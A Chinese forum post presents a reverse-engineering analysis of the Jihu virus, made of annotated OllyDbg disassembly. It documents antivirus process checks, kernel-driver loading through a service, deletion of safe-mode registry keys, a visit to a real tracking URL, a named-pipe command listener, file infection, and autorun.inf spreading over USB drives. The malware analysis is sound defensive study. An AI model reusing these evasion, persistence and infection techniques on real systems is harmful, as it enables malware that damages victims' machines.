极虎样本分析2 by 零度x[LSG]
本帖最后由 是昔流芳 于 2011-2-11 12:13 编辑多谢hmily的鼓励,让我有了继续分析的信心。
但是由于实在是没有经验,难免漏掉一些行为,还有很多地方分析的不好,虚心请教大牛们指点~
驱动接触的也实在不多,没有分析驱动~
00871B9A|.6A 1C push 1C ; /BufSize = 1C (28.)
00871B9C|.8D45 E4 lea eax, dword ptr ; |
00871B9F|.50 push eax ; |Buffer
00871BA0|.FF75 E0 push dword ptr ; |Address
00871BA3|.FF15 2C918700 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00871BA9|.8B45 E8 mov eax, dword ptr ;VirTualQuery获取内存信息
00871BAC|.A3 38DC8700 mov dword ptr , eax
00871BB1|.6A 00 push 0 ; /pModule = NULL
00871BB3|.FF15 04918700 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00871BB9|.3B05 38DC8700 cmp eax, dword ptr ; GetModuleHandle获取当前模块基址
00871BBF|.75 16 jnz short 00871BD7 ;两者比较,相等执行loder部分功能,不相等则开始。。。
008758E2|.6A 00 push 0 ; /pThreadId = NULL
008758E4|.6A 00 push 0 ; |CreationFlags = 0
008758E6|.6A 00 push 0 ; |pThreadParm = NULL
008758E8|.68 9D538700 push 0087539D ; |ThreadFunction = appmgmts.0087539D
008758ED|.6A 00 push 0 ; |StackSize = 0
008758EF|.6A 00 push 0 ; |pSecurity = NULL
008758F1|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
008758F7|>33C0 xor eax, eax ;启动线程A
线程A:
查找卡巴和Defender的进程,如果存在就试图躲避杀毒软件查杀,然后以标准方式加载驱动,执行后删除,并且删除了安全模式,最后创建了6个线程。
00871681|> \6A 00 push 0 ; /hTemplateFile = NULL
00871683|.68 80000000 push 80 ; |Attributes = NORMAL
00871688|.FFB5 E8FEFFFF push dword ptr ; |Mode
0087168E|.6A 00 push 0 ; |pSecurity = NULL
00871690|.6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00871692|.68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00871697|.68 08938700 push 00879308 ; |FileName = "C:\DelInfo.bin"
0087169C|.FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008716A2|.8985 ECFEFFFF mov dword ptr , eax ;打开文件C:\DelInfo,bin
008717BA|.6A 00 push 0 ; /pOverlapped = NULL
008717BC|.8D45 FC lea eax, dword ptr ; |
008717BF|.50 push eax ; |pBytesRead
008717C0|.68 04010000 push 104 ; |BytesToRead = 104 (260.)
008717C5|.8D85 F0FEFFFF lea eax, dword ptr ; |
008717CB|.50 push eax ; |Buffer
008717CC|.FFB5 ECFEFFFF push dword ptr ; |hFile
008717D2|.FF15 EC908700 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
008717D8|.FFB5 ECFEFFFF push dword ptr ; /读取文件
008717DE|.FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00871812|.50 |push eax ; /FileName
00871813|.FF15 18918700 |call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
00871819|.83F8 01 |cmp eax, 1 ;删除之前的loader
0087182A|> \68 08938700 push 00879308 ; /FileName = "C:\DelInfo.bin"
0087182F|.FF15 18918700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00871835|.8B85 F0FEFFFF mov eax, dword ptr ;删除C:\DelInfo.bin
00871125|.6A 00 push 0 ; /ProcessID = 0
00871127|.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00871129|.E8 627D0000 call <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
0087112E|.8985 D0FEFFFF mov dword ptr , eax
00871134|.8D85 D8FEFFFF lea eax, dword ptr
0087113A|.50 push eax ; /lppe
0087113B|.FFB5 D0FEFFFF push dword ptr ; |hSnapshot
00871141|.E8 3E7D0000 call <jmp.&KERNEL32.Process32First> ; \Process32First
00871146|>FF75 08 /push dword ptr ; /String2
00871149|.8D85 FCFEFFFF |lea eax, dword ptr ; |
0087114F|.50 |push eax ; |String1
00871150|.FF15 F0908700 |call dword ptr [<&KERNEL32.lstrcmpiA>; \lstrcmpiA
00871156|.85C0 |test eax, eax ;查找卡巴和Defender
00871158|.75 0E |jnz short 00871168
0087115A|.8B85 E0FEFFFF |mov eax, dword ptr
00871160|.8985 D4FEFFFF |mov dword ptr , eax
00871166|.EB 16 |jmp short 0087117E
00871168|>8D85 D8FEFFFF |lea eax, dword ptr
0087116E|.50 |push eax ; /lppe
0087116F|.FFB5 D0FEFFFF |push dword ptr ; |hSnapshot
00871175|.E8 107D0000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
0087117A|.85C0 |test eax, eax
0087117C|.^ 75 C8 \jnz short 00871146
0087117E|>FFB5 D0FEFFFF push dword ptr ; /hObject
00871184|.FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
008754D7 .68 18D48700 push 0087D418 ; /Buffer = appmgmts.0087D418
008754DC .68 04010000 push 104 ; |BufSize = 104 (260.)
008754E1 .FF15 4C918700 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
008754E7 .68 04010000 push 104 ; /得到临时目录
008754FB .68 04010000 push 104 ; /BufSize = 104 (260.)
00875500 .68 20D58700 push 0087D520 ; |Buffer = appmgmts.0087D520
00875505 .FF15 B0908700 call dword ptr [<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
0087550B .68 04010000 push 104 ; /得到系统目录
00871536 .50 push eax ; /ProcNameOrOrdinal = "LoadResource"
00871537 .68 F0928700 push 008792F0 ; |/pModule = "kernel32.dll"
0087153C .FF15 04918700 call dword ptr [<&KERNEL32.GetModuleH>; |\GetModuleHandleA
00871542 .50 push eax ; |hModule
00871543 .FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00871549 .8945 F8 mov dword ptr , eax ;得到LoadResource地址
0087154C .68 00938700 push 00879300 ; /ResourceType = "FILE"
00871551 .0FB745 10 movzx eax, word ptr ; |
00871555 .50 push eax ; |ResourceName
00871556 .FF75 0C push dword ptr ; |hModule
00871559 .FF15 C8908700 call dword ptr [<&KERNEL32.FindResour>; \FindResourceA
0087155F .8945 E0 mov dword ptr , eax ;查找资源
00871562 .FF75 E0 push dword ptr ; /hResource
00871565 .FF75 0C push dword ptr ; |hModule
00871568 .FF15 E8908700 call dword ptr [<&KERNEL32.SizeofReso>; \SizeofResource
0087156E .8945 FC mov dword ptr , eax ;得到资源大小
00871571 .FF75 E0 push dword ptr
00871574 .FF75 0C push dword ptr
00871577 .FF55 F8 call dword ptr ;kernel32.LoadResource
0087157A .8945 BC mov dword ptr , eax ;加载资源
008715D3 .6A 00 push 0 ; /hTemplateFile = NULL
008715D5 .FF75 14 push dword ptr ; |Attributes
008715D8 .6A 02 push 2 ; |Mode = CREATE_ALWAYS
008715DA .6A 00 push 0 ; |pSecurity = NULL
008715DC .6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
008715DE .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
008715E3 .FF75 08 push dword ptr ; |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys"
008715E6 .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
008715EC .8945 E8 mov dword ptr , eax ;创建C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
0087533A|.68 3F000F00 push 0F003F
0087533F|.6A 00 push 0
00875341|.6A 00 push 0
00875343|.FF15 18908700 call dword ptr [<&ADVAPI32.OpenSCMana>;advapi32.OpenSCManagerA
00875349|.8945 FC mov dword ptr , eax ;打开SCM
0087534C|.6A 00 push 0 ; /Password = NULL
0087534E|.6A 00 push 0 ; |ServiceStartName = NULL
00875350|.6A 00 push 0 ; |pDependencies = NULL
00875352|.6A 00 push 0 ; |pTagId = NULL
00875354|.6A 00 push 0 ; |LoadOrderGroup = NULL
00875356|.FF75 08 push dword ptr ; |BinaryPathName
00875359|.6A 01 push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
0087535B|.6A 03 push 3 ; |StartType = SERVICE_DEMAND_START
0087535D|.6A 01 push 1 ; |ServiceType = SERVICE_KERNEL_DRIVER
0087535F|.68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
00875364|.68 44988700 push 00879844 ; |DisplayName = "Forter"
00875369|.68 44988700 push 00879844 ; |ServiceName = "Forter"
0087536E|.FF75 FC push dword ptr ; |hManager
00875371|.FF15 20908700 call dword ptr [<&ADVAPI32.CreateServ>; \CreateServiceA
00875377|.8945 F8 mov dword ptr , eax ;创建服务
0087537A|.6A 00 push 0
0087537C|.6A 00 push 0
0087537E|.FF75 F8 push dword ptr
00875381|.FF15 24908700 call dword ptr [<&ADVAPI32.StartServi>;advapi32.StartServiceA
00875387|.FF75 F8 push dword ptr ;标准方式加载驱动
0087538A|.FF15 00908700 call dword ptr [<&ADVAPI32.CloseServi>;advapi32.CloseServiceHandle
00875390|.FF75 FC push dword ptr
00875393|.FF15 00908700 call dword ptr [<&ADVAPI32.CloseServi>;advapi32.CloseServiceHandle
0087559E .50 push eax
0087559F .68 02000080 push 80000002
008755A4 .FF95 D0F6FFFF call dword ptr ;shlwapi.SHDeleteKeyA
008755AA .8D85 C0F4FFFF lea eax, dword ptr ;删除SYSTEM\CurrentControlSet\Services子键
008755B0 .50 push eax ; /FileName
008755B1 .FF15 18918700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
008755B7 .68 04010000 push 104 ; /删除C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Forter.sys
00871AA0|.50 push eax ; /pHandle
00871AA1|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00871AA6|.6A 00 push 0 ; |Reserved = 0
00871AA8|.8D85 78FBFFFF lea eax, dword ptr ; |
00871AAE|.50 push eax ; |Subkey
00871AAF|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00871AB4|.FF15 0C908700 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00871ABA|.6A 04 push 4 ; /打开SYSTEM\CurrentControlSet\Services\LOADDLL
00871ABC|.8D45 10 lea eax, dword ptr ; |
00871ABF|.50 push eax ; |Buffer
00871AC0|.6A 04 push 4 ; |ValueType = REG_DWORD
00871AC2|.6A 00 push 0 ; |Reserved = 0
00871AC4|.68 80948700 push 00879480 ; |ValueName = "Start"
00871AC9|.FF75 BC push dword ptr ; |hKey
00871ACC|.FF15 08908700 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00871AD2|.FF75 BC push dword ptr ; /设置Start键值为2
00871AD5|.FF15 10908700 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0087586E > \6A 00 push 0 ; /pThreadId = NULL
00875870 .6A 00 push 0 ; |CreationFlags = 0
00875872 .6A 00 push 0 ; |pThreadParm = NULL
00875874 .68 63518700 push 00875163 ; |ThreadFunction = appmgmts.00875163
00875879 .6A 00 push 0 ; |StackSize = 0
0087587B .6A 00 push 0 ; |pSecurity = NULL
0087587D .FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875883 .6A 00 push 0 ; /创建线程A1
00875885 .6A 00 push 0 ; |CreationFlags = 0
00875887 .6A 00 push 0 ; |pThreadParm = NULL
00875889 .68 4A378700 push 0087374A ; |ThreadFunction = appmgmts.0087374A
0087588E .6A 00 push 0 ; |StackSize = 0
00875890 .6A 00 push 0 ; |pSecurity = NULL
00875892 .FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00875898 .8D85 D8FEFFFF lea eax, dword ptr ;创建线程A2
0087694E|.6A 00 push 0 ; /pThreadId = NULL
00876950|.6A 00 push 0 ; |CreationFlags = 0
00876952|.6A 00 push 0 ; |pThreadParm = NULL
00876954|.68 AB8C8700 push 00878CAB ; |ThreadFunction = appmgmts.00878CAB
00876959|.6A 00 push 0 ; |StackSize = 0
0087695B|.6A 00 push 0 ; |pSecurity = NULL
0087695D|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00876963|.68 409B8700 push 00879B40 ; /创建线程A3
00876968|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0087696D|.FF15 F4918700 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876973|.68 749B8700 push 00879B74 ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00876978|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0087697D|.FF15 F4918700 call dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00876983|.833D 50B58700>cmp dword ptr , -1 ;删除安全模式
00871C0B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00871C10|.8D85 E8FEFFFF lea eax, dword ptr ; |
00871C16|.50 push eax ; |PathBuffer
00871C17|.FF75 08 push dword ptr ; |hModule
00871C1A|.FF15 00918700 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00871C20|.83A5 E0FEFFFF>and dword ptr , 0 ;获取加载自身的exe
00871C3F|.6A 00 |push 0 ; /hTemplateFile = NULL
00871C41|.6A 00 |push 0 ; |Attributes = 0
00871C43|.6A 03 |push 3 ; |Mode = OPEN_EXISTING
00871C45|.6A 00 |push 0 ; |pSecurity = NULL
00871C47|.6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ
00871C49|.68 00000080 |push 80000000 ; |Access = GENERIC_READ
00871C4E|.8D85 E8FEFFFF |lea eax, dword ptr ; |
00871C54|.50 |push eax ; |FileName = "C:\tools\OllyICE\LOADDLL.EXE"
00871C55|.FF15 C4908700 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00871C5B|.8945 F4 |mov dword ptr , eax ;打开exe
00871C70|> \6A 00 push 0 ; /pFileSizeHigh = NULL
00871C72|.FF75 F4 push dword ptr ; |hFile
00871C75|.FF15 24918700 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00871C7B|.8945 F8 mov dword ptr , eax ;获取文件大小
00871CEF|.6A 00 push 0 ; /pOverlapped = NULL
00871CF1|.8D45 FC lea eax, dword ptr ; |
00871CF4|.50 push eax ; |pBytesRead
00871CF5|.FF75 F8 push dword ptr ; |BytesToRead
00871CF8|.FFB5 E4FEFFFF push dword ptr ; |Buffer
00871CFE|.FF75 F4 push dword ptr ; |hFile
00871D01|.FF15 EC908700 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00871D07|.FF75 F4 push dword ptr ; /读取文件
00876B05|.6A 00 push 0
00876B07|.6A 00 push 0
00876B09|.6A 00 push 0
00876B0B|.68 24638700 push 00876324
00876B10|.6A 00 push 0
00876B12|.6A 00 push 0
00876B14|.FF55 FC call dword ptr ;kernel32.CreateThread
00876B17|>833D 84C68700>cmp dword ptr , 0 ;创建线程A4
00876B20|.6A 00 push 0
00876B22|.6A 00 push 0
00876B24|.6A 00 push 0
00876B26|.68 988A8700 push 00878A98
00876B2B|.6A 00 push 0
00876B2D|.6A 00 push 0
00876B2F|.FF55 FC call dword ptr ;kernel32.CreateThread
00876B32|>833D 88C68700>cmp dword ptr , 0 ;创建线程A5
00876B3B|.6A 00 push 0
00876B3D|.6A 00 push 0
00876B3F|.6A 01 push 1
00876B41|.68 DC858700 push 008785DC
00876B46|.6A 00 push 0
00876B48|.6A 00 push 0
00876B4A|.FF55 FC call dword ptr ;kernel32.CreateThread
00876B4D|>833D 8CC68700>cmp dword ptr , 0 ;创建线程A6
线程A1:
用IE打开http://tj.nba1001.net:7777/tj/mac.html10秒后关闭
00875224|.50 push eax ; /pProcessInfo
00875225|.8D85 98F9FFFF lea eax, dword ptr ; |
0087522B|.50 push eax ; |pStartupInfo
0087522C|.6A 00 push 0 ; |CurrentDir = NULL
0087522E|.6A 00 push 0 ; |pEnvironment = NULL
00875230|.68 00000004 push 4000000 ; |CreationFlags = CREATE_DEFAULT_ERROR_MODE
00875235|.6A 01 push 1 ; |InheritHandles = TRUE
00875237|.6A 00 push 0 ; |pThreadSecurity = NULL
00875239|.6A 00 push 0 ; |pProcessSecurity = NULL
0087523B|.8D85 E0F9FFFF lea eax, dword ptr ; |
00875241|.50 push eax ; |CommandLine
00875242|.6A 00 push 0 ; |ModuleFileName = NULL
00875244|.FF15 3C918700 call dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA
0087524A|.83F8 01 cmp eax, 1 ;用IE打开http://tj.nba1001.net:7777/tj/mac.html
0087524D|. /75 31 jnz short 00875280
0087524F|. |FFB5 ECFEFFFF push dword ptr ; /hObject
00875255|. |FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0087525B|. |68 10270000 push 2710 ; /Timeout = 10000. ms
00875260|. |FF15 E4908700 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00875266|. |6A 00 push 0 ; /延时10秒
00875268|. |FFB5 E8FEFFFF push dword ptr ; |hProcess
0087526E|. |FF15 B4908700 call dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00875274|. |FFB5 E8FEFFFF push dword ptr ; /关闭IE
0087527A|. |FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
线程A2:
00871B08|.50 push eax ; /pWSAData
00871B09|.68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
00871B0E|.FF15 44928700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00871B14|>8D85 68FEFFFF /lea eax, dword ptr
00871B1A|.50 |push eax
00871B1B|.6A 00 |push 0
00871B1D|.6A 00 |push 0
00871B1F|.68 88948700 |push 00879488 ;ASCII "www.baidu.com"
00871B24|.FF15 48928700 |call dword ptr [<&WS2_32.getaddrinfo>;ws2_32.getaddrinfo
00871B2A|.85C0 |test eax, eax ;打开百度,估计测试网络
00872D1D|.68 80958700 push 00879580 ; /FileName = "Wininet.dll"
00872D22|.FF15 40918700 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00872D28|.8945 F4 mov dword ptr , eax ;加载wininet.dll
00872D2B|.68 8C958700 push 0087958C ; /ProcNameOrOrdinal = "InternetOpenA"
00872D30|.FF75 F4 push dword ptr ; |hModule
00872D33|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D39|.A3 4CDC8700 mov dword ptr , eax
00872D3E|.68 9C958700 push 0087959C ; /ProcNameOrOrdinal = "InternetOpenUrlA"
00872D43|.FF75 F4 push dword ptr ; |hModule
00872D46|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D4C|.A3 50DC8700 mov dword ptr , eax
00872D51|.68 B0958700 push 008795B0 ; /ProcNameOrOrdinal = "HttpQueryInfoA"
00872D56|.FF75 F4 push dword ptr ; |hModule
00872D59|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D5F|.A3 54DC8700 mov dword ptr , eax
00872D64|.68 C0958700 push 008795C0 ; /ProcNameOrOrdinal = "InternetReadFileExA"
00872D69|.FF75 F4 push dword ptr ; |hModule
00872D6C|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D72|.A3 58DC8700 mov dword ptr , eax
00872D77|.68 D4958700 push 008795D4 ; /ProcNameOrOrdinal = "InternetCloseHandle"
00872D7C|.FF75 F4 push dword ptr ; |hModule
00872D7F|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D85|.A3 5CDC8700 mov dword ptr , eax
00872D8A|.68 E8958700 push 008795E8 ; /ProcNameOrOrdinal = "InternetSetStatusCallback"
00872D8F|.FF75 F4 push dword ptr ; |hModule
00872D92|.FF15 F4908700 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
00872D98|.A3 60DC8700 mov dword ptr , eax ;获取一系列函数地址
008727D9 > \8D85 70FEFFFF lea eax, dword ptr
008727DF .50 push eax ; /pWSAData
008727E0 .68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
008727E5 .FF15 44928700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
008727EB >8D85 5CFEFFFF lea eax, dword ptr
008727F1 .50 push eax
008727F2 .6A 00 push 0
008727F4 .6A 00 push 0
008727F6 .68 44958700 push 00879544 ;ASCII "www.xunlei.com"
008727FB .FF15 48928700 call dword ptr [<&WS2_32.getaddrinfo>>;ws2_32.getaddrinfo
00872801 .85C0 test eax, eax ;测试网络?
00872812 > \FFB5 5CFEFFFF push dword ptr
00872818 .FF15 50928700 call dword ptr [<&WS2_32.freeaddrinfo>;ws2_32.freeaddrinfo
0087281E .6A 40 push 40 ; /释放了...
0087283C .68 54958700 push 00879554 ;ASCII "www.3-0B6F-415d-B5C7-832F0.com"
00872841 .FF15 48928700 call dword ptr [<&WS2_32.getaddrinfo>>;ws2_32.getaddrinfo
00872847 .85C0 test eax, eax ;打开www.3-0B6F-415d-B5C7-832F0.com
0087285B .50 push eax
0087285C .8D85 18FEFFFF lea eax, dword ptr
00872862 .50 push eax
00872863 .6A 00 push 0
00872865 .8B85 5CFEFFFF mov eax, dword ptr
0087286B .FF70 10 push dword ptr
0087286E .8B85 5CFEFFFF mov eax, dword ptr
00872874 .FF70 18 push dword ptr
00872877 .FF95 60FEFFFF call dword ptr ;ws2_32.WSAAddressToStringA
0087287D .FFB5 5CFEFFFF push dword ptr ;地址转换成字符串
00872883 .FF15 50928700 call dword ptr [<&WS2_32.freeaddrinfo>;ws2_32.freeaddrinfo
0087380C|> \6A 00 push 0 ; /pThreadId = NULL
0087380E|.6A 00 push 0 ; |CreationFlags = 0
00873810|.6A 00 push 0 ; |pThreadParm = NULL
00873812|.68 88358700 push 00873588 ; |ThreadFunction = appmgmts.00873588
00873817|.6A 00 push 0 ; |StackSize = 0
00873819|.6A 00 push 0 ; |pSecurity = NULL
0087381B|.FF15 80918700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
00873821|.8945 F8 mov dword ptr , eax ;创建线程
00873841|.A3 68DC8700 mov dword ptr , eax
00873846|>FF35 E4B58700 push dword ptr ; /Timeout = 900000. ms
0087384C|.FF35 68DC8700 push dword ptr ; |hObject = NULL
00873852|.FF15 50918700 call dword ptr [<&KERNEL32.WaitForSin>; \WaitForSingleObject
00873858|.85C0 test eax, eax ;等待线程结束
线程A3:
创建命名管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5,听取命令。
00878CCC .6A 00 push 0 ; /hTemplateFile = NULL
00878CCE .6A 00 push 0 ; |Attributes = 0
00878CD0 .6A 03 push 3 ; |Mode = OPEN_EXISTING
00878CD2 .6A 00 push 0 ; |pSecurity = NULL
00878CD4 .6A 00 push 0 ; |ShareMode = 0
00878CD6 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878CDB .FF75 F4 push dword ptr ; |FileName
00878CDE .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878CE4 .8945 F0 mov dword ptr , eax ;创建管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D1C > \6A 00 push 0
00878D1E .6A 00 push 0
00878D20 .68 00010000 push 100
00878D25 .68 00010000 push 100
00878D2A .6A 01 push 1
00878D2C .6A 06 push 6
00878D2E .6A 03 push 3
00878D30 .FF75 F4 push dword ptr ;appmgmts.00879AC0
00878D33 .FF15 68908700 call dword ptr [<&KERNEL32.CreateName>;kernel32.CreateNamedPipeA
00878D39 .8945 F8 mov dword ptr , eax ;创建命名管道\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
00878D41 .6A 00 push 0
00878D43 .FF75 F8 push dword ptr
00878D46 .FF15 78908700 call dword ptr [<&KERNEL32.ConnectNam>;kernel32.ConnectNamedPipe
00878D4C .6A 00 push 0 ; /等待连接~
线程A4:
感染exe,rar,htm,html,asp,aspx文件
0876E17 > \6A 00 push 0 ; /hTemplateFile = NULL
00876E19 .68 80000000 push 80 ; |Attributes = NORMAL
00876E1E .6A 03 push 3 ; |Mode = OPEN_EXISTING
00876E20 .6A 00 push 0 ; |pSecurity = NULL
00876E22 .6A 00 push 0 ; |ShareMode = 0
00876E24 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00876E29 .FF75 08 push dword ptr ; |FileName
00876E2C .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00876E32 .8945 98 mov dword ptr , eax ;打开文件
00876E51 .6A 02 push 2 ; /Origin = FILE_END
00876E53 .6A 00 push 0 ; |pOffsetHi = NULL
00876E55 .6A 00 push 0 ; |OffsetLo = 0
00876E57 .FF75 98 push dword ptr ; |hFile
00876E5A .FF15 28918700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00876E60 .8945 DC mov dword ptr , eax ;设置指针
00876E63 .6A 00 push 0 ; /MapName = NULL
00876E65 .6A 00 push 0 ; |MaximumSizeLow = 0
00876E67 .6A 00 push 0 ; |MaximumSizeHigh = 0
00876E69 .6A 04 push 4 ; |Protection = PAGE_READWRITE
00876E6B .6A 00 push 0 ; |pSecurity = NULL
00876E6D .FF75 98 push dword ptr ; |hFile
00876E70 .FF15 74918700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileMappingA
00876E84 > \68 00040000 push 400 ; /MapSize = 400 (1024.)
00876E89 .6A 00 push 0 ; |OffsetLow = 0
00876E8B .6A 00 push 0 ; |OffsetHigh = 0
00876E8D .68 1F000F00 push 0F001F ; |AccessMode = F001F
00876E92 .FF75 D0 push dword ptr ; |hMapObject
00876E95 .FF15 60918700 call dword ptr [<&KERNEL32.MapViewOfF>; \MapViewOfFile
00876FB0 .68 00040000 push 400 ; /FlushSize = 400
00876FB5 .FF75 D8 push dword ptr ; |FlushBase
00876FB8 .FF15 94908700 call dword ptr [<&KERNEL32.FlushViewO>; \FlushViewOfFile
00877304 .FF75 D8 push dword ptr ; /BaseAddress
00877307 .FF15 64918700 call dword ptr [<&KERNEL32.UnmapViewO>; \UnmapViewOfFile
0087730D .FF75 D0 push dword ptr ; /hObject
00877310 .FF15 10918700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00877316 .8365 D8 00 and dword ptr , 0
0087731A .8365 D0 00 and dword ptr , 0
0087731E .6A 02 push 2 ; /Origin = FILE_END
00877320 .6A 00 push 0 ; |pOffsetHi = NULL
00877322 .8B85 18FFFFFF mov eax, dword ptr ; |
00877328 .0345 AC add eax, dword ptr ; |
0087732B .50 push eax ; |OffsetLo
0087732C .FF75 98 push dword ptr ; |hFile
0087732F .FF15 28918700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
00877335 .FF75 98 push dword ptr ; /hFile
00877338 .FF15 30918700 call dword ptr [<&KERNEL32.SetEndOfFi>; \SetEndOfFile
线程A5:
感染可移动磁盘
008787A4 .68 80000000 push 80 ; /FileAttributes = NORMAL
008787A9 .8D85 E8FDFFFF lea eax, dword ptr ; |
008787AF .50 push eax ; |FileName
008787B0 .FF15 80908700 call dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA
008787B6 .68 80000000 push 80 ; /设置文件属性recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008787E0 .50 push eax ; /Path = "MZ",90,"autorun.inf"
008787E1 .FF15 F0918700 call dword ptr [<&SHLWAPI.PathFileExi>; \PathFileExistsA
008787E7 .83F8 01 cmp eax, 1 ;判断autorun.inf是否存在
00878955 > \6A 00 push 0 ; /hTemplateFile = NULL
00878957 .68 80000000 push 80 ; |Attributes = NORMAL
0087895C .6A 02 push 2 ; |Mode = CREATE_ALWAYS
0087895E .6A 00 push 0 ; |pSecurity = NULL
00878960 .6A 00 push 0 ; |ShareMode = 0
00878962 .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878967 .8D85 D8F4FFFF lea eax, dword ptr ; |
0087896D .50 push eax ; |FileName
0087896E .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878974 .8985 E4FDFFFF mov dword ptr , eax ;创建autorun.inf
00878988 > \6A 00 push 0 ; /pOverlapped = NULL
0087898A .8D85 F4FEFFFF lea eax, dword ptr ; |
00878990 .50 push eax ; |pBytesWritten
00878991 .8D85 E0F5FFFF lea eax, dword ptr ; |
00878997 .50 push eax ; |/String
00878998 .FF15 D0908700 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
0087899E .50 push eax ; |nBytesToWrite
0087899F .8D85 E0F5FFFF lea eax, dword ptr ; |
008789A5 .50 push eax ; |Buffer = 0006EC78
008789A6 .FFB5 E4FDFFFF push dword ptr ; |hFile
008789AC .FF15 E0908700 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
008789B2 .FFB5 E4FDFFFF push dword ptr ; /写入以下内容
0006EC785B 61 75 74 6F 72 75 6E 5D 0D 0A 4F 50 45 4E 3D..OPEN=
0006EC8872 65 63 79 63 6C 65 2E 7B 36 34 35 46 46 30 34recycle.{645FF04
0006EC9830 2D 35 30 38 31 2D 31 30 31 42 2D 39 46 30 380-5081-101B-9F08
0006ECA82D 30 30 41 41 30 30 32 46 39 35 34 45 7D 5C 53-00AA002F954E}\S
0006ECB865 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5Cetup.exe..shell\
